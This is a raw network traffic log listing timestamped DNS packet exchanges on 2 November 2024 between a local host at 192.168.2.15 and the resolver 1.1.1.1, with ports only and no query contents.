Nov 2, 2024 04:05:25.814894915 CET	53	59246	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:25.814959049 CET	59246	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:25.821379900 CET	53	58842	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:25.821574926 CET	53	59246	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:26.836092949 CET	49488	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:26.838943005 CET	40163	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:26.843390942 CET	53	49488	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:26.843533039 CET	49488	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:26.845753908 CET	53	40163	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:26.845868111 CET	40163	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:26.850158930 CET	53	49488	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:26.852509975 CET	53	40163	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:27.863394976 CET	36595	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:27.868117094 CET	42061	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:27.870696068 CET	53	36595	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:27.870831013 CET	36595	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:27.875292063 CET	53	42061	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:27.875375986 CET	42061	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:27.877376080 CET	53	36595	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:27.882358074 CET	53	42061	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:29.020670891 CET	44050	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:29.020967007 CET	38276	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:29.027987003 CET	53	44050	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:29.028141022 CET	44050	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:29.034616947 CET	53	44050	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:29.109244108 CET	53	38276	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:29.109518051 CET	38276	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:29.116435051 CET	53	38276	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:30.126491070 CET	54216	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:30.126624107 CET	60772	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:30.133575916 CET	53	54216	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:30.133594990 CET	53	60772	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:30.133706093 CET	54216	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:30.133718967 CET	60772	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:30.140201092 CET	53	54216	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:30.140391111 CET	53	60772	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:31.151158094 CET	48619	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:31.152080059 CET	36036	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:31.157933950 CET	53	48619	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:31.158030033 CET	48619	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:31.159229040 CET	53	36036	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:31.159301043 CET	36036	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:31.164486885 CET	53	48619	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:31.166008949 CET	53	36036	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:32.177814960 CET	44673	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:32.178963900 CET	34850	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:32.184824944 CET	53	44673	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:32.184927940 CET	44673	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:32.186275005 CET	53	34850	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:32.186352968 CET	34850	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:32.191695929 CET	53	44673	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:32.193083048 CET	53	34850	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:33.330432892 CET	36846	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:33.333771944 CET	43058	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:33.337703943 CET	53	36846	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:33.337802887 CET	36846	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:33.340864897 CET	53	43058	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:33.340951920 CET	43058	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:33.344348907 CET	53	36846	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:33.347937107 CET	53	43058	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:34.356296062 CET	57942	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:34.356384993 CET	46392	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:34.362881899 CET	53	57942	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:34.362904072 CET	53	46392	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:34.362993956 CET	57942	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:34.363006115 CET	46392	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:34.369590998 CET	53	57942	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:34.369620085 CET	53	46392	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:35.380393982 CET	57371	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:35.381093025 CET	41077	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:35.387787104 CET	53	57371	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:35.387871981 CET	57371	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:35.388045073 CET	53	41077	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:35.388112068 CET	41077	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:35.394620895 CET	53	41077	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:35.394629955 CET	53	57371	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:36.406922102 CET	52386	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:36.407349110 CET	37835	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:36.414518118 CET	53	37835	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:36.414611101 CET	37835	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:36.421354055 CET	53	37835	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:36.499017954 CET	53	52386	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:36.499365091 CET	52386	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:36.506139994 CET	53	52386	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:37.518062115 CET	42243	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:37.518501997 CET	52580	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:37.524936914 CET	53	42243	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:37.525043964 CET	42243	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:37.525629997 CET	53	52580	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:37.525697947 CET	52580	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:37.531653881 CET	53	42243	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:37.532196045 CET	53	52580	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:38.541233063 CET	49118	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:38.541317940 CET	38340	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:38.548073053 CET	53	38340	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:38.548182964 CET	38340	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:38.554807901 CET	53	38340	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:38.629172087 CET	53	49118	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:38.629347086 CET	49118	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:38.635994911 CET	53	49118	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:39.768743038 CET	49962	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:39.768958092 CET	40329	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:39.775517941 CET	53	49962	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:39.775654078 CET	49962	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:39.775893927 CET	53	40329	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:39.775963068 CET	40329	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:39.782399893 CET	53	49962	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:39.782414913 CET	53	40329	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:40.795780897 CET	38585	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:40.796210051 CET	36811	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:40.803800106 CET	53	38585	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:40.803814888 CET	53	36811	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:40.803900003 CET	38585	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:40.803910971 CET	36811	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:40.810384035 CET	53	36811	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:40.810394049 CET	53	38585	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:41.946778059 CET	48450	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:41.948044062 CET	46771	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:41.953905106 CET	53	48450	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:41.954001904 CET	48450	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:41.954705000 CET	53	46771	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:41.954786062 CET	46771	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:41.960481882 CET	53	48450	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:41.961267948 CET	53	46771	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:42.969410896 CET	47515	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:42.969800949 CET	59742	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:42.976316929 CET	53	47515	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:42.976433039 CET	47515	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:42.977334023 CET	53	59742	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:42.977401018 CET	59742	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:42.983000040 CET	53	47515	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:42.984291077 CET	53	59742	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:43.992177010 CET	43144	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:43.992470026 CET	36427	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:43.999120951 CET	53	43144	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:43.999142885 CET	53	36427	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:43.999228954 CET	43144	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:43.999239922 CET	36427	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:44.005943060 CET	53	36427	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:44.006388903 CET	53	43144	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:45.017781019 CET	54306	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:45.018649101 CET	49045	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:45.024204969 CET	53	54306	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:45.024329901 CET	54306	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:45.025753021 CET	53	49045	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:45.025835991 CET	49045	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:45.030622959 CET	53	54306	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:45.033314943 CET	53	49045	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:46.045211077 CET	45580	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:46.045535088 CET	59893	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:46.053095102 CET	53	45580	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:46.053216934 CET	45580	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:46.053272963 CET	53	59893	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:46.053345919 CET	59893	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:46.060421944 CET	53	45580	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:46.060628891 CET	53	59893	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:47.068799019 CET	34111	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:47.069145918 CET	53539	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:47.075858116 CET	53	34111	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:47.075978041 CET	34111	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:47.076433897 CET	53	53539	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:47.076509953 CET	53539	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:47.082580090 CET	53	34111	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:47.083017111 CET	53	53539	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:48.091964960 CET	41208	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:48.092065096 CET	41038	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:48.099148035 CET	53	41038	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:48.099174023 CET	53	41208	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:48.099241972 CET	41038	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:48.099253893 CET	41208	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:48.105891943 CET	53	41208	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:48.105910063 CET	53	41038	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:49.116259098 CET	58638	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:49.116452932 CET	39010	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:49.123269081 CET	53	39010	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:49.123368979 CET	39010	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:49.129884005 CET	53	39010	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:49.208369017 CET	53	58638	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:49.208472967 CET	58638	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:49.215184927 CET	53	58638	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:50.223216057 CET	44027	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:50.223289967 CET	48592	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:50.229926109 CET	53	48592	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:50.229954958 CET	53	44027	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:50.230046034 CET	48592	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:50.230057955 CET	44027	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:50.236531973 CET	53	48592	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:50.236661911 CET	53	44027	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:51.248075008 CET	47541	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:51.249332905 CET	52020	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:51.255100012 CET	53	47541	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:51.255178928 CET	47541	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:51.256249905 CET	53	52020	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:51.256314039 CET	52020	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:51.261596918 CET	53	47541	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:51.262866020 CET	53	52020	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:52.273854017 CET	54427	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:52.274008036 CET	46982	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:52.281449080 CET	53	54427	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:52.281461954 CET	53	46982	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:52.281574965 CET	54427	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:52.281586885 CET	46982	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:52.288326979 CET	53	46982	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:52.288336992 CET	53	54427	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:53.296520948 CET	56537	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:53.296750069 CET	54477	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:53.303680897 CET	53	56537	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:53.303742886 CET	53	54477	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:53.303796053 CET	56537	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:53.303808928 CET	54477	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:53.310291052 CET	53	56537	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:53.310365915 CET	53	54477	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:54.320297003 CET	56854	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:54.320439100 CET	47577	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:54.327406883 CET	53	47577	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:54.327466965 CET	53	56854	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:54.327531099 CET	47577	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:54.327531099 CET	56854	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:54.334254980 CET	53	47577	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:54.334283113 CET	53	56854	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:55.950200081 CET	33609	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:55.950350046 CET	43993	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:55.957711935 CET	53	43993	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:55.957731962 CET	53	33609	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:55.957850933 CET	43993	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:55.957870007 CET	33609	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:55.964600086 CET	53	43993	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:55.964757919 CET	53	33609	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:57.317881107 CET	49928	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:57.318224907 CET	37854	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:57.324690104 CET	53	49928	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:57.324846029 CET	49928	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:57.325093985 CET	53	37854	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:57.325158119 CET	37854	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:57.331374884 CET	53	49928	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:57.331625938 CET	53	37854	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:58.340198994 CET	37761	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:58.340483904 CET	35756	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:58.348162889 CET	53	35756	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:58.348258972 CET	35756	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:58.348298073 CET	53	37761	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:58.348346949 CET	37761	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:58.356018066 CET	53	35756	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:58.356609106 CET	53	37761	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:59.364306927 CET	36698	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:59.365209103 CET	45570	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:59.372908115 CET	53	36698	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:59.373029947 CET	36698	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:59.373261929 CET	53	45570	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:59.373322010 CET	45570	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:05:59.380939007 CET	53	45570	1.1.1.1	192.168.2.15
Nov 2, 2024 04:05:59.383322954 CET	53	36698	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:00.391331911 CET	38864	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:00.393064976 CET	38728	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:00.398037910 CET	53	38864	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:00.398228884 CET	38864	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:00.399616003 CET	53	38728	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:00.399729013 CET	38728	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:00.404845953 CET	53	38864	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:00.406454086 CET	53	38728	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:01.417921066 CET	60769	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:01.418328047 CET	55860	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:01.425916910 CET	53	60769	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:01.425929070 CET	53	55860	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:01.426050901 CET	60769	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:01.426081896 CET	55860	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:01.432674885 CET	53	60769	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:01.433058023 CET	53	55860	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:02.444830894 CET	38052	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:02.446453094 CET	52745	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:02.451569080 CET	53	38052	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:02.451694965 CET	38052	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:02.458559990 CET	53	38052	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:02.534948111 CET	53	52745	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:02.535264015 CET	52745	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:02.542768955 CET	53	52745	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:03.551444054 CET	60345	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:03.552031040 CET	58732	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:03.558862925 CET	53	60345	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:03.558979988 CET	60345	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:03.559319973 CET	53	58732	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:03.559400082 CET	58732	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:03.565792084 CET	53	60345	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:03.566065073 CET	53	58732	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:04.699867964 CET	37535	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:04.700258970 CET	50745	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:04.707024097 CET	53	37535	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:04.707108974 CET	37535	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:04.707468033 CET	53	50745	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:04.707532883 CET	50745	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:04.713685989 CET	53	37535	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:04.714037895 CET	53	50745	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:05.721532106 CET	45310	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:05.721744061 CET	35603	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:05.729087114 CET	53	35603	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:05.729106903 CET	53	45310	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:05.729176044 CET	35603	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:05.729211092 CET	45310	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:05.735677958 CET	53	35603	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:05.735688925 CET	53	45310	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:06.744323015 CET	48839	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:06.744414091 CET	51558	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:06.751507044 CET	53	51558	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:06.751595020 CET	51558	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:06.752974033 CET	53	48839	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:06.753060102 CET	48839	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:06.758332014 CET	53	51558	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:06.759612083 CET	53	48839	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:07.769675016 CET	56027	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:07.769768953 CET	33569	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:07.776772022 CET	53	56027	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:07.776808023 CET	53	33569	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:07.776968002 CET	56027	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:07.776994944 CET	33569	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:07.783643961 CET	53	33569	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:07.783657074 CET	53	56027	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:08.792901039 CET	53341	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:08.793549061 CET	44499	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:08.800131083 CET	53	53341	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:08.800296068 CET	53341	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:08.800641060 CET	53	44499	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:08.800721884 CET	44499	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:08.807013035 CET	53	53341	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:08.807359934 CET	53	44499	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:09.814646959 CET	42045	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:09.814801931 CET	59668	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:09.821743011 CET	53	59668	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:09.821793079 CET	53	42045	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:09.821901083 CET	59668	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:09.821901083 CET	42045	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:09.828581095 CET	53	59668	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:09.828593969 CET	53	42045	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:10.837508917 CET	54746	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:10.837940931 CET	57564	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:10.845587015 CET	53	54746	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:10.845598936 CET	53	57564	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:10.845676899 CET	54746	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:10.845695972 CET	57564	53	192.168.2.15	1.1.1.1
Nov 2, 2024 04:06:10.852581024 CET	53	54746	1.1.1.1	192.168.2.15
Nov 2, 2024 04:06:10.852626085 CET	53	57564	1.1.1.1	192.168.2.15
